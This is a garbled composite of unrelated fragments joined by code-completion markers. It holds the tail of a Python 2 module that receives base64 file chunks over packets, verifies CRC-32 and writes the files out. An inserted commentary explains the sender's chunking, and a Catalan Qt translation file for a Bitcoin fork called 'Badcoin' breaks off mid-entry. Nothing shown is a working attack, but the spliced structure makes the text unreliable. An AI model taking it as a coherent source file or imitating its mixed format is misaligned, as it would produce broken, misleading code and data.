"-")[:-7]) elif data[28:].find(END_PACKET) != -1: # Extract data from Initiation packet: man_string = data[28:] # String to manipulate man_array = man_string.split(DATA_SEPARATOR) # Exploit data into array if filename != man_array[0]: sys.stderr.write("You tried transferring 2 files simultaneous. Killing my self now!\n") log_fh.write("Detected 2 file simultaneous. Killing my self.\n") return -1 else: log_fh.write("Got termination packet for %s\n" % man_array[0]) comp_crc = zlib.crc32(current_file) if str(comp_crc) == checksum: # CRC validated log_fh.write("CRC validation is green for " + str(comp_crc) + " with file name: " + filename + "\n") current_file = base64.b64decode(current_file) # Write to file fh = open(filename + "_" + checksum, WRITE_BINARY) fh.write(current_file) fh.close() files_received += 1 else: # CRC failed log_fh.write("CRC validation FAILED for '" + str(comp_crc) + "' with : " + checksum + "\n") # Resetting counters: i = 0 filename = "" data = "" man_string = "" man_array = [] elif data[28:].find(DATA_TERMINATOR) != -1: # Found a regular packet current_file += data[28:data.find(DATA_TERMINATOR)] log_fh.write("Received packet %s" % i + "\n") i += 1 if __name__ == "__main__": sys.stdout.write("This is meant to be a module for python and not a stand alone executable\n")<|fim▁end|>
import base64 from socket import *
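`send_file` above base64-encodes the file, CRC-32s the encoded string, then slices it into `x` full chunks of `max_packetsize` bytes plus a `y = len % max_packetsize` remainder (the sample is Python 2, so its `/` is integer division). The framing arithmetic in isolation — checksum and slicing only, no raw sockets, which need root:

import base64
import zlib

def frame_payload(data, max_packetsize=512):
    """Split a payload the way the sample does: base64, crc32, fixed-size slices."""
    encoded = base64.b64encode(data)
    checksum = zlib.crc32(encoded)          # receiver re-checks this before decoding
    chunks = [encoded[i:i + max_packetsize]
              for i in range(0, len(encoded), max_packetsize)]
    return checksum, chunks

checksum, chunks = frame_payload(b"hello world" * 100, max_packetsize=64)
print(checksum, len(chunks), sum(len(c) for c in chunks))
# Reassembly on the receiving side is just b"".join(chunks) plus a crc32 re-check.
# Note the sample's post-loop "last section" slice IamDone[max_packetsize*i:...] appears
# to come out empty, since the loop's final iteration already covered the remainder.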
<|file_name|>bitcoin_ca_ES.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" ?><!DOCTYPE TS><TS language="ca_ES" version="2.0"> <defaultcodec>UTF-8</defaultcodec> <context> <name>AboutDialog</name> <message> <location filename="../forms/aboutdialog.ui" line="+14"/> <source>About Bitcoin</source> <translation>Sobre Badcoin</translation> </message> <message> <location line="+39"/> <source>&lt;b&gt;Bitcoin&lt;/b&gt; version</source> <translation>&lt;b&gt;Badcoin&lt;/b&gt; versió</translation> </message> <message> <location line="+57"/> <source> This is experimental software. Distributed under the MIT/X11 software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/) and cryptographic software written by Eric Young ([email protected]) and UPnP software written by Thomas Bernard.</source> <translation>\n Aquest és software experimental.\n\n Distribuït sota llicència de software MIT/11, veure l&apos;arxiu COPYING o http://www.opensource.org/licenses/mit-license.php.\n\nAquest producte inclou software desarrollat pel projecte OpenSSL per a l&apos;ús de OppenSSL Toolkit (http://www.openssl.org/) i de softwqre criptogràfic escrit per l&apos;Eric Young ([email protected]) i software UPnP escrit per en Thomas Bernard.</translation> </message> <message> <location filename="../aboutdialog.cpp" line="+14"/> <source>Copyright</source> <translation>Copyright</translation> </message> <message> <location line="+0"/> <source>The Bitcoin developers</source> <translation type="unfinished"/> </message> </context> <context> <name>AddressBookPage</name> <message> <location filename="../forms/addressbookpage.ui" line="+14"/> <source>Address Book</source> <translation>Llibreta d&apos;adreces</translation> </message> <message> <location line="+19"/> <source>Double-click to edit address or label</source> <translation>Feu doble clic per editar l&apos;adreça o l&apos;etiqueta</translation> </message> <message> <location line="+27"/> <source>Create a new address</source> <translation>Crear una nova adreça</translation> </message> <message> <location line="+14"/> <source>Copy the currently selected address to the system clipboard</source> <translation>Copiar l&apos;adreça seleccionada al porta-retalls del sistema</translation> </message> <message> <location line="-11"/> <source>&amp;New Address</source> <translation>&amp;Nova adreça</translation> </message> <message> <location filename="../addressbookpage.cpp" line="+63"/> <source>These are your Bitcoin addresses for receiving payments. You may want to give a different one to each sender so you can keep track of who is paying you.</source> <translation>Aquestes són les teves adreces Badcoin per a rebre pagaments. 
Pot interesar-te proveïr diferents adreces a cadascun dels enviadors així pots identificar qui et va pagant.</translation> </message> <message> <location filename="../forms/addressbookpage.ui" line="+14"/> <source>&amp;Copy Address</source> <translation>&amp;Copiar adreça</translation> </message> <message> <location line="+11"/> <source>Show &amp;QR Code</source> <translation>Mostrar codi &amp;QR</translation> </message> <message> <location line="+11"/> <source>Sign a message to prove you own a Bitcoin address</source> <translation>Signa el missatge per provar que ets propietari de l&apos;adreça Badcoin</translation> </message> <message> <location line="+3"/> <source>Sign &amp;Message</source> <translation>Signar &amp;Missatge</translation> </message> <message> <location line="+25"/> <source>Delete the currently selected address from the list</source> <translation>Esborrar l&apos;adreça sel·leccionada</translation> </message> <message> <location line="+27"/> <source>Export the data in the current tab to a file</source> <translation type="unfinished"/> </message> <message> <location line="+3"/> <source>&amp;Export</source> <translation type="unfinished"/> </message> <message> <location line="-44"/> <source>Verify a message to ensure it was signed with a specified Bitcoin address</source> <translation>Verificar un missatge per asegurar-se que ha estat signat amb una adreça Badcoin específica</translation> </message> <message> <location line="+3"/> <source>&amp;Verify Message</source> <translation>&amp;Verificar el missatge</translation> </message> <message> <location line="+14"/> <source>&amp;Delete</source> <translation>&amp;Esborrar</translation> </message> <message> <location filename="../addressbookpage.cpp" line="-5"/> <source>These are your Bitcoin addresses for sending payments. Always check the amount and the receiving address before sending coins.</source> <translation>Aquestes són la seva adreça de Badcoin per enviar els pagaments. 
Sempre revisi la quantitat i l&apos;adreça del destinatari abans transferència de monedes.</translation> </message> <message> <location line="+13"/> <source>Copy &amp;Label</source> <translation>Copiar &amp;Etiqueta</translation> </message> <message> <location line="+1"/> <source>&amp;Edit</source> <translation>&amp;Editar</translation> </message> <message> <location line="+1"/> <source>Send &amp;Coins</source> <translation>Enviar &amp;Monedes</translation> </message> <message> <location line="+260"/> <source>Export Address Book Data</source> <translation>Exporta llibreta d&apos;adreces</translation> </message> <message> <location line="+1"/> <source>Comma separated file (*.csv)</source> <translation>Arxiu de separació per comes (*.csv)</translation> </message> <message> <location line="+13"/> <source>Error exporting</source> <translation>Error en l&apos;exportació</translation> </message> <message> <location line="+0"/> <source>Could not write to file %1.</source> <translation>No s&apos;ha pogut escriure a l&apos;arxiu %1.</translation> </message> </context> <context> <name>AddressTableModel</name> <message> <location filename="../addresstablemodel.cpp" line="+144"/> <source>Label</source> <translation>Etiqueta</translation> </message> <message> <location line="+0"/> <source>Address</source> <translation>Adreça</translation> </message> <message> <location line="+36"/> <source>(no label)</source> <translation>(sense etiqueta)</translation> </message> </context> <context> <name>AskPassphraseDialog</name> <message> <location filename="../forms/askpassphrasedialog.ui" line="+26"/> <source>Passphrase Dialog</source> <translation>Dialeg de contrasenya</translation> </message> <message> <location line="+21"/> <source>Enter passphrase</source> <translation>Introdueix contrasenya</translation> </message> <message> <location line="+14"/> <source>New passphrase</source> <translation>Nova contrasenya</translation> </message> <message> <location line="+14"/> <source>Repeat new passphrase</source> <translation>Repeteix la nova contrasenya</translation> </message> <message> <location filename="../askpassphrasedialog.cpp" line="+33"/> <source>Enter the new passphrase to the wallet.&lt;br/&gt;Please use a passphrase of &lt;b&gt;10 or more random characters&lt;/b&gt;, or &lt;b&gt;eight or more words&lt;/b&gt;.</source> <translation>Introdueixi la nova contrasenya al moneder&lt;br/&gt;Si us plau useu una contrasenya de &lt;b&gt;10 o més caracters aleatoris&lt;/b&gt;, o &lt;b&gt;vuit o més paraules&lt;/b&gt;.</translation> </message> <message> <location line="+1"/> <source>Encrypt wallet</source> <translation>Xifrar la cartera</translation> </message> <message> <location line="+3"/> <source>This operation needs your wallet passphrase to unlock the wallet.</source> <translation>Aquesta operació requereix la seva contrasenya del moneder per a desbloquejar-lo.</translation> </message> <message> <location line="+5"/> <source>Unlock wallet</source> <translation>Desbloqueja el moneder</translation> </message> <message> <location line="+3"/> <source>This operation needs your wallet passphrase to decrypt the wallet.</source> <translation>Aquesta operació requereix la seva contrasenya del moneder per a desencriptar-lo.</translation> </message> <message> <location line="+5"/> <source>Decrypt wallet</source> <translation>Desencripta el moneder</translation> </message> <message> <location line="+3"/> <source>Change passphrase</source> <translation>Canviar la contrasenya</translation> </message> <message> <location 
line="+1"/> <source>Enter the old and new passphrase to the wallet.</source> <translation>Introdueixi tant l&apos;antiga com la nova contrasenya de moneder.</translation> </message> <message> <location line="+46"/> <source>Confirm wallet encryption</source> <translation>Confirmar l&apos;encriptació del moneder</translation> </message> <message> <location line="+1"/> <source>Warning: If you encrypt your wallet and lose your passphrase, you will &lt;b&gt;LOSE ALL OF YOUR BITCOINS&lt;/b&gt;!</source> <translation>Advertència: Si encripteu el vostre moneder i perdeu la constrasenya, &lt;b&gt;PERDREU TOTS ELS VOSTRES BADCOINS&lt;/b&gt;!</translation> </message> <message> <location line="+0"/> <source>Are you sure you wish to encrypt your wallet?</source> <translation>Esteu segur que voleu encriptar el vostre moneder?</translation> </message> <message> <location line="+15"/> <source>IMPORTANT: Any previous backups you have made of your wallet file should be replaced with the newly generated, encrypted wallet file. For security reasons, previous backups of the unencrypted wallet file will become useless as soon as you start using the new, encrypted wallet.</source> <translation>IMPORTANT: Tota copia de seguretat que hagis realitzat hauria de ser reemplaçada pel, recentment generat, arxiu encriptat del moneder.</translation> </message> <message> <location line="+100"/> <location line="+24"/> <source>Warning: The Caps Lock key is on!</source> <translation>Advertència: Les lletres majúscules estàn activades!</translation> </message> <message> <location line="-130"/> <location line="+58"/> <source>Wallet encrypted</source> <translation>Moneder encriptat</translation> </message> <message> <location line="-56"/> <source>Bitcoin will close now to finish the encryption process. Remember that encrypting your wallet cannot fully protect your bitcoins from being stolen by malware infecting your computer.</source> <translation>Badcoin es tancarà ara per acabar el procés d&apos;encriptació. Recorda que encriptar el teu moneder no protegeix completament els teus badcoins de ser robades per programari maliciós instal·lat al teu ordinador.</translation> </message> <message> <location line="+13"/> <location line="+7"/> <location line="+42"/> <location line="+6"/> <source>Wallet encryption failed</source> <translation>L&apos;encriptació del moneder ha fallat</translation> </message> <message> <location line="-54"/> <source>Wallet encryption failed due to an internal error. Your wallet was not encrypted.</source> <translation>L&apos;encriptació del moneder ha fallat per un error intern. 
El seu moneder no ha estat encriptat.</translation> </message> <message> <location line="+7"/> <location line="+48"/> <source>The supplied passphrases do not match.</source> <translation>La contrasenya introduïda no coincideix.</translation> </message> <message> <location line="-37"/> <source>Wallet unlock failed</source> <translation>El desbloqueig del moneder ha fallat</translation> </message> <message> <location line="+1"/> <location line="+11"/> <location line="+19"/> <source>The passphrase entered for the wallet decryption was incorrect.</source> <translation>La contrasenya introduïda per a desencriptar el moneder és incorrecte.</translation> </message> <message> <location line="-20"/> <source>Wallet decryption failed</source> <translation>La desencriptació del moneder ha fallat</translation> </message> <message> <location line="+14"/> <source>Wallet passphrase was successfully changed.</source> <translation>La contrasenya del moneder ha estat modificada correctament.</translation> </message> </context> <context> <name>BitcoinGUI</name> <message> <location filename="../bitcoingui.cpp" line="+233"/> <source>Sign &amp;message...</source> <translation>Signar &amp;missatge...</translation> </message> <message> <location line="+280"/> <source>Synchronizing with network...</source> <translation>Sincronitzant amb la xarxa ...</translation> </message> <message> <location line="-349"/> <source>&amp;Overview</source> <translation>&amp;Panorama general</translation> </message> <message> <location line="+1"/> <source>Show general overview of wallet</source> <translation>Mostra panorama general del moneder</translation> </message> <message> <location line="+20"/> <source>&amp;Transactions</source> <translation>&amp;Transaccions</translation> </message> <message> <location line="+1"/> <source>Browse transaction history</source> <translation>Cerca a l&apos;historial de transaccions</translation> </message> <message> <location line="+7"/> <source>Edit the list of stored addresses and labels</source> <translation>Edita la llista d&apos;adreces emmagatzemada i etiquetes</translation> </message> <message> <location line="-14"/> <source>Show the list of addresses for receiving payments</source> <translation>Mostra el llistat d&apos;adreces per rebre pagaments</translation> </message> <message> <location line="+31"/> <source>E&amp;xit</source> <translation>S&amp;ortir</translation> </message> <message> <location line="+1"/> <source>Quit application</source> <translation>Sortir de l&apos;aplicació</translation> </message> <message> <location line="+4"/> <source>Show information about Bitcoin</source> <translation>Mostra informació sobre Badcoin</translation> </message> <message> <location line="+2"/> <source>About &amp;Qt</source> <translation>Sobre &amp;Qt</translation> </message> <message> <location line="+1"/> <source>Show information about Qt</source> <translation>Mostra informació sobre Qt</translation> </message> <message> <location line="+2"/> <source>&amp;Options...</source> <translation>&amp;Opcions...</translation> </message> <message> <location line="+6"/> <source>&amp;Encrypt Wallet...</source> <translation>&amp;Xifrar moneder</translation> </message> <message> <location line="+3"/> <source>&amp;Backup Wallet...</source> <translation>&amp;Realitzant copia de seguretat del moneder...</translation> </message> <message> <location line="+2"/> <source>&amp;Change Passphrase...</source> <translation>&amp;Canviar contrasenya...</translation> </message> <message> <location line="+285"/> 
<source>Importing blocks from disk...</source> <translation>Important blocs del disc..</translation> </message> <message> <location line="+3"/> <source>Reindexing blocks on disk...</source> <translation>Re-indexant blocs al disc...</translation> </message> <message> <location line="-347"/> <source>Send coins to a Bitcoin address</source> <translation>Enviar monedes a una adreça Badcoin</translation> </message> <message> <location line="+49"/> <source>Modify configuration options for Bitcoin</source> <translation>Modificar les opcions de configuració per badcoin</translation> </message> <message> <location line="+9"/> <source>Backup wallet to another location</source> <translation>Realitzar còpia de seguretat del moneder a un altre directori</translation> </message> <message> <location line="+2"/> <source>Change the passphrase used for wallet encryption</source> <translation>Canviar la constrasenya d&apos;encriptació del moneder</translation> </message> <message> <location line="+6"/> <source>&amp;Debug window</source> <translation>&amp;Finestra de debug</translation> </message> <message> <location line="+1"/> <source>Open debugging and diagnostic console</source> <translation>Obrir la consola de diagnòstic i debugging</translation> </message> <message> <location line="-4"/> <source>&amp;Verify message...</source> <translation>&amp;Verifica el missatge..</translation> </message> <message> <location line="-165"/> <location line="+530"/> <source>Bitcoin</source> <translation>Badcoin</translation> </message> <message> <location line="-530"/> <source>Wallet</source> <translation>Moneder</translation> </message> <message> <location line="+101"/> <source>&amp;Send</source> <translation>&amp;Enviar</translation> </message> <message> <location line="+7"/> <source>&amp;Receive</source> <translation>&amp;Rebre</translation> </message> <message> <location line="+14"/> <source>&amp;Addresses</source> <translation>&amp;Adreces</translation> </message> <message> <location line="+22"/> <source>&amp;About Bitcoin</source> <translation>&amp;Sobre Badcoin</translation> </message> <message> <location line="+9"/> <source>&amp;Show / Hide</source> <translation>&amp;Mostrar / Amagar</translation> </message> <message> <location line="+1"/> <source>Show or hide the main Window</source> <translation>Mostrar o amagar la finestra principal</translation> </message> <message> <location line="+3"/> <source>Encrypt the private keys that belong to your wallet</source> <translation>Xifrar les claus privades pertanyents al seu moneder</translation> </message> <message> <location line="+7"/> <source>Sign messages with your Bitcoin addresses to prove you own them</source> <translation>Signa el missatges amb la seva adreça de Badcoin per provar que les poseeixes</translation> </message> <message> <location line="+2"/> <source>Verify messages to ensure they were signed with specified Bitcoin addresses</source> <translation>Verificar els missatges per assegurar-te que han estat signades amb una adreça Badcoin específica.</translation> </message> <message> <location line="+28"/> <source>&amp;File</source> <translation>&amp;Arxiu</translation> </message> <message> <location line="+7"/> <source>&amp;Settings</source> <translation>&amp;Configuració</translation> </message> <message> <location line="+6"/> <source>&amp;Help</source> <translation>&amp;Ajuda</translation> </message> <message> <location line="+9"/> <source>Tabs toolbar</source> <translation>Barra d&apos;eines de seccions</translation> </message> <message> <location 
line="+17"/> <location line="+10"/> <source>[testnet]</source> <translation>[testnet]</translation> </message> <message> <location line="+47"/> <source>Bitcoin client</source> <translation>Client Badcoin</translation> </message> <message numerus="yes"> <location line="+141"/> <source>%n active connection(s) to Bitcoin network</source> <translation><numerusform>%n connexió activa a la xarxa Badcoin</numerusform><numerusform>%n connexions actives a la xarxa Badcoin</numerusform></translation> </message> <message> <location line="+22"/> <source>No block source available...</source> <translation type="unfinished"/> </message> <message> <location line="+12"/> <source>Processed %1 of %2 (estimated) blocks of transaction history.</source> <translation>Processat el %1 de %2 (estimat) dels blocs del històric de transaccions.</translation> </message> <message> <location line="+4"/> <source>Processed %1 blocks of transaction history.</source> <translation>Proccessats %1 blocs del històric de transaccions.</translation> </message> <message numerus="yes"> <location line="+20"/> <source>%n hour(s)</source> <translation><numerusform>%n hora</numerusform><numerusform>%n hores</numerusform></translation> </message> <message numerus="yes"> <location line="+4"/> <source>%n day(s)</source> <translation><numerusform>%n dia</numerusform><numerusform>%n dies</numerusform></translation> </message> <message numerus="yes"> <location line="+4"/> <source>%n week(s)</source> <translation><numerusform>%n setmana</numerusform><numerusform>%n setmanes</numerusform></translation> </message> <message> <location line="+4"/> <source>%1 behind</source> <translation>%1 radera</translation> </message> <message> <location line="+14"/> <source>Last received block was generated %1 ago.</source> <translation>Lúltim bloc rebut ha estat generat fa %1.</translation> </message> <message> <location line="+2"/> <source>Transactions after this will not yet be visible.</source> <translation>Les transaccions a partir d&apos;això no seràn visibles.</translation> </message> <message> <location line="+22"/> <source>Error</source> <translation>Error</translation> </message> <message> <location line="+3"/> <source>Warning</source> <translation>Avís</translation> </message> <message> <location line="+3"/> <source>Information</source> <translation>Informació</translation> </message> <message> <location line="+70"/> <source>This transaction is over the size limit. You can still send it for a fee of %1, which goes to the nodes that process your transaction and helps to support the network. Do you want to pay the fee?</source> <translation>Aquesta transacció supera el límit de tamany. Tot i així pots enviar-la amb una comissió de %1, que es destinen als nodes que processen la seva transacció i ajuda a donar suport a la xarxa. 
Vols pagar la comissió?</translation> </message> <message> <location line="-140"/> <source>Up to date</source> <translation>Al dia</translation> </message> <message> <location line="+31"/> <source>Catching up...</source> <translation>Posar-se al dia ...</translation> </message> <message> <location line="+113"/> <source>Confirm transaction fee</source> <translation>Confirmar comisió de transacció</translation> </message> <message> <location line="+8"/> <source>Sent transaction</source> <translation>Transacció enviada</translation> </message> <message> <location line="+0"/> <source>Incoming transaction</source> <translation>Transacció entrant</translation> </message> <message> <location line="+1"/> <source>Date: %1 Amount: %2 Type: %3 Address: %4 </source> <translation>Data: %1\nQuantitat %2\n Tipus: %3\n Adreça: %4\n</translation> </message> <message> <location line="+33"/> <location line="+23"/> <source>URI handling</source> <translation>Manejant URI</translation> </message> <message> <location line="-23"/> <location line="+23"/> <source>URI can not be parsed! This can be caused by an invalid Bitcoin address or malformed URI parameters.</source> <translation>la URI no pot ser processada! Això es pot ser causat per una adreça Badcoin invalida o paràmetres URI malformats.</translation> </message> <message> <location line="+17"/> <source>Wallet is &lt;b&gt;encrypted&lt;/b&gt; and currently &lt;b&gt;unlocked&lt;/b&gt;</source> <translation>El moneder està &lt;b&gt;encriptat&lt;/b&gt; i actualment &lt;b&gt;desbloquejat&lt;/b&gt;</translation> </message> <message> <location line="+8"/> <source>Wallet is &lt;b&gt;encrypted&lt;/b&gt; and currently &lt;b&gt;locked&lt;/b&gt;</source> <translation>El moneder està &lt;b&gt;encriptat&lt;/b&gt; i actualment &lt;b&gt;bloquejat&lt;/b&gt;</translation> </message> <message> <location filename="../bitcoin.cpp" line="+111"/> <source>A fatal error occurred. Bitcoin can no longer continue safely and will quit.</source> <translation>Ha tingut lloc un error fatal. Badcoin no pot continuar executant-se de manera segura i es tancará.</translation> </message> </context> <context> <name>ClientModel</name> <message> <location filename="../clientmodel.cpp" line="+104"/> <source>Network Alert</source> <translation>Alerta de xarxa</translation> </message> </context> <context> <name>EditAddressDialog</name> <message> <location filename="../forms/editaddressdialog.ui" line="+14"/> <source>Edit Address</source> <translation>Editar Adreça</translation> </message> <message> <location line="+11"/> <source>&amp;Label</source> <translation>&amp;Etiqueta</translation> </message> <message> <location line="+10"/> <source>The label associated with this address book entry</source> <translation>Etiqueta associada amb aquesta entrada de la llibreta d&apos;adreces</translation> </message> <message> <location line="+7"/> <source>&amp;Address</source> <translation>&amp;Direcció</translation> </message> <message> <location line="+10"/> <source>The address associated with this address book entry. This can only be modified for sending addresses.</source> <translation>Adreça associada amb aquesta entrada de la llibreta d&apos;adreces. 
Només pot ser modificat per a enviar adreces.</translation> </message> <message> <location filename="../editaddressdialog.cpp" line="+21"/> <source>New receiving address</source> <translation>Nova adreça de recepció.</translation> </message> <message> <location line="+4"/> <source>New sending address</source> <translation>Nova adreça d&apos;enviament</translation> </message> <message> <location line="+3"/> <source>Edit receiving address</source> <translation>Editar adreces de recepció</translation> </message> <message> <location line="+4"/> <source>Edit sending address</source> <translation>Editar adreces d&apos;enviament</translation> </message> <message> <location line="+76"/> <source>The entered address &quot;%1&quot; is already in the address book.</source> <translation>L&apos;adreça introduïda &quot;%1&quot; ja és present a la llibreta d&apos;adreces.</translation> </message> <message> <location line="-5"/> <source>The entered address &quot;%1&quot; is not a valid Bitcoin address.</source> <translation>L&apos;adreça introduida &quot;%1&quot; no és una adreça Badcoin valida.</translation> </message> <message> <location line="+10"/> <source>Could not unlock wallet.</source> <translation>No s&apos;ha pogut desbloquejar el moneder.</translation> </message> <message> <location line="+5"/> <source>New key generation failed.</source> <translation>Ha fallat la generació d&apos;una nova clau.</translation> </message> </context> <context> <name>GUIUtil::HelpMessageBox</name> <message> <location filename="../guiutil.cpp" line="+424"/> <location line="+12"/> <source>BadCoind-Qt</source> <translation>Badcoin-Qt</translation> </message> <message> <location line="-12"/> <source>version</source> <translation>versió</translation> </message> <message> <location line="+2"/> <source>Usage:</source> <translation>Ús:</translation> </message> <message> <location line="+1"/> <source>command-line options</source> <translation>Opcions de la línia d&apos;ordres</translation> </message> <message> <location line="+4"/> <source>UI options</source> <translation>Opcions de IU</translation> </message> <message> <location line="+1"/> <source>Set language, for example &quot;de_DE&quot; (default: system locale)</source> <translation>Definir llenguatge, per exemple &quot;de_DE&quot; (per defecte: Preferències locals de sistema)</translation> </message> <message> <location line="+1"/> <source>Start minimized</source> <translation>Iniciar minimitzat</translation> </message> <message> <location line="+1"/> <source>Show splash screen on startup (default: 1)</source> <translation>Mostrar finestra de benvinguda a l&apos;inici (per defecte: 1)</translation> </message> </context> <context> <name>OptionsDialog</name> <message> <location filename="../forms/optionsdialog.ui" line="+14"/> <source>Options</source> <translation>Opcions</translation> </message> <message> <location line="+16"/> <source>&amp;Main</source> <translation>&amp;Principal</translation> </message> <message> <location line="+6"/> <source>Optional transaction fee per kB that helps make sure your transactions are processed quickly. 
Most transactions are 1 kB.</source> <translation type="unfinished"/> </message> <message> <location line="+15"/> <source>Pay transaction &amp;fee</source> <translation>Pagar &amp;comisió de transacció</translation> </message> <message> <location line="+31"/> <source>Automatically start Bitcoin after logging in to the system.</source> <translation>Iniciar automàticament Badcoin després de l&apos;inici de sessió del sistema.</translation> </message> <message> <location line="+3"/> <source>&amp;Start Bitcoin on system login</source> <translation>&amp;Iniciar Badcoin al inici de sessió del sistema.</translation> </message> <message> <location line="+35"/> <source>Reset all client options to default.</source> <translation>Reestablir totes les opcions del client.</translation> </message> <message> <location line="+3"/> <source>&amp;Reset Options</source> <translation>&amp;Reestablir Opcions</translation> </message> <message> <location line="+13"/> <source>&amp;Network</source> <translation>&amp;Xarxa</translation> </message> <message> <location line="+6"/> <source>Automatically open the Bitcoin client port on the router. This only works when your router supports UPnP and it is enabled.</source> <translation>Obrir el port del client de Badcoin al router de forma automàtica. Això només funciona quan el teu router implementa UPnP i l&apos;opció està activada.</translation> </message> <message> <location line="+3"/> <source>Map port using &amp;UPnP</source> <translation>Port obert amb &amp;UPnP</translation> </message> <message> <location line="+7"/> <source>Connect to the Bitcoin network through a SOCKS proxy (e.g. when connecting through Tor).</source> <translation>Connectar a la xarxa Badcoin a través de un SOCKS proxy (per exemple connectant a través de Tor).</translation> </message> <message> <location line="+3"/> <source>&amp;Connect through SOCKS proxy:</source> <translation>&amp;Connecta a través de un proxy SOCKS:</translation> </message> <message> <location line="+9"/> <source>Proxy &amp;IP:</source> <translation>&amp;IP del proxy:</translation> </message> <message> <location line="+19"/> <source>IP address of the proxy (e.g. 127.0.0.1)</source> <translation>Adreça IP del proxy (per exemple 127.0.0.1)</translation> </message> <message> <location line="+7"/> <source>&amp;Port:</source> <translation>&amp;Port:</translation> </message> <message> <location line="+19"/> <source>Port of the proxy (e.g. 9050)</source> <translation>Port del proxy (per exemple 9050)</translation> </message> <message> <location line="+7"/> <source>SOCKS &amp;Version:</source> <translation>&amp;Versió de SOCKS:</translation> </message> <message> <location line="+13"/> <source>SOCKS version of the proxy (e.g. 5)</source> <translation>Versió SOCKS del proxy (per exemple 5)</translation> </message> <message> <location line="+36"/> <source>&amp;Window</source> <translation>&amp;Finestra</translation> </message> <message> <location line="+6"/> <source>Show only a tray icon after minimizing the window.</source> <translation>Mostrar només l&apos;icona de la barra al minimitzar l&apos;aplicació.</translation> </message> <message> <location line="+3"/> <source>&amp;Minimize to the tray instead of the taskbar</source> <translation>&amp;Minimitzar a la barra d&apos;aplicacions</translation> </message> <message> <location line="+7"/> <source>Minimize instead of exit the application when the window is closed. 
When this option is enabled, the application will be closed only after selecting Quit in the menu.</source> <translation>Minimitza en comptes de sortir de la aplicació al tancar la finestra. Quan aquesta opció està activa, la aplicació només es tancarà al seleccionar Sortir al menú.</translation> </message> <message> <location line="+3"/> <source>M&amp;inimize on close</source> <translation>M&amp;inimitzar al tancar</translation> </message> <message> <location line="+21"/> <source>&amp;Display</source> <translation>&amp;Pantalla</translation> </message> <message> <location line="+8"/> <source>User Interface &amp;language:</source> <translation>Llenguatge de la Interfície d&apos;Usuari:</translation> </message> <message> <location line="+13"/> <source>The user interface language can be set here. This setting will take effect after restarting Bitcoin.</source> <translation>Aquí pots definir el llenguatge de l&apos;aplicatiu. Aquesta configuració tindrà efecte un cop es reiniciï Badcoin.</translation> </message> <message> <location line="+11"/> <source>&amp;Unit to show amounts in:</source> <translation>&amp;Unitats per mostrar les quantitats en:</translation> </message> <message> <location line="+13"/> <source>Choose the default subdivision unit to show in the interface and when sending coins.</source> <translation>Sel·lecciona la unitat de subdivisió per defecte per mostrar en la interficie quan s&apos;envien monedes.</translation> </message> <message> <location line="+9"/> <source>Whether to show Bitcoin addresses in the transaction list or not.</source> <translation>Mostrar adreces Badcoin als llistats de transaccions o no.</translation> </message> <message> <location line="+3"/> <source>&amp;Display addresses in transaction list</source> <translation>&amp;Mostrar adreces al llistat de transaccions</translation> </message> <message> <location line="+71"/> <source>&amp;OK</source> <translation>&amp;OK</translation> </message> <message> <location line="+7"/> <source>&amp;Cancel</source> <translation>&amp;Cancel·la</translation> </message> <message> <location line="+10"/> <source>&amp;Apply</source> <translation>&amp;Aplicar</translation> </message> <message> <location filename="../optionsdialog.cpp" line="+53"/> <source>default</source> <translation>Per defecte</translation> </message> <message> <location line="+130"/> <source>Confirm options reset</source> <translation>Confirmi el reestabliment de les opcions</translation> </message> <message> <location line="+1"/> <source>Some settings may require a client restart to take effect.</source> <translation>Algunes configuracions poden requerir reiniciar el client per a que tinguin efecte.</translation> </message> <message> <location line="+0"/> <source>Do you want to proceed?</source> <translation>Vols procedir?</translation> </message> <message> <location line="+42"/> <location line="+9"/> <source>Warning</source> <translation>Avís</translation> </message> <message> <location line="-9"/> <location line="+9"/> <source>This setting will take effect after restarting Bitcoin.</source> <translation>Aquesta configuració tindrà efecte un cop es reiniciï Badcoin.</translation> </message> <message> <location line="+29"/> <source>The supplied proxy address is invalid.</source> <translation>L&apos;adreça proxy introduïda és invalida.</translation> </message> </context> <context> <name>OverviewPage</name> <message> <location filename="../forms/overviewpage.ui" line="+14"/> <source>Form</source> <translation>Formulari</translation> </message> <message> 
<location line="+50"/> <location line="+166"/> <source>The displayed information may be out of date. Your wallet automatically synchronizes with the Bitcoin network after a connection is established, but this process has not completed yet.</source> <translation>La informació mostrada pot no estar al día. El teu moneder es sincronitza automàticament amb la xarxa Badcoin un cop s&apos;ha establert connexió, però aquest proces no s&apos;ha completat encara.</translation> </message> <message> <location line="-124"/> <source>Balance:</source> <translation>Balanç:</translation> </message> <message> <location line="+29"/> <source>Unconfirmed:</source> <translation>Sense confirmar:</translation> </message> <message> <location line="-78"/> <source>Wallet</source> <translation>Moneder</translation> </message> <message> <location line="+107"/> <source>Immature:</source> <translation>Immatur:</translation> </message> <message> <location line="+13"/> <source>Mined balance that has not yet matured</source> <translation>Balanç minat que encara no ha madurat</translation> </message> <message> <location line="+46"/> <source>&lt;b&gt;Recent transactions&lt;/b&gt;</source> <translation>&lt;b&gt;Transaccions recents&lt;/b&gt;</translation> </message> <message> <location line="-101"/> <source>Your current balance</source> <translation>El seu balanç actual</translation> </message> <message> <location line="+29"/> <source>Total of transactions that have yet to be confirmed, and do not yet count toward the current balance</source> <translation>Total de transaccions encara sense confirmar, que encara no es content en el balanç actual</translation> </message> <message> <location filename="../overviewpage.cpp" line="+116"/> <location line="+1"/> <source>out of sync</source> <translation>Fora de sincronia</translation> </message> </context> <context> <name>PaymentServer</name> <message> <location filename="../paymentserver.cpp" line="+107"/> <source>Cannot start bitcoin: click-to-pay handler</source> <translation>No es pot iniciar badcoin: manejador clicla-per-pagar</translation> </message> </context> <context> <name>QRCodeDialog</name> <message> <location filename="../forms/qrcodedialog.ui" line="+14"/> <source>QR Code Dialog</source> <translation>Dialeg del codi QR</translation> </message> <message> <location line="+59"/> <source>Request Payment</source> <translation>Reclamar pagament</translation> </message> <message> <location line="+56"/> <source>Amount:</source> <translation>Quantitat:</translation> </message> <message> <location line="-44"/> <source>Label:</source> <translation>Etiqueta:</translation> </message> <message> <location line="+19"/> <source>Message:</source> <translation>Missatge:</translation> </message> <message> <location line="+71"/> <source>&amp;Save As...</source> <translation>&amp;Desar com...</translation> </message> <message> <location filename="../qrcodedialog.cpp" line="+62"/> <source>Error encoding URI into QR Code.</source> 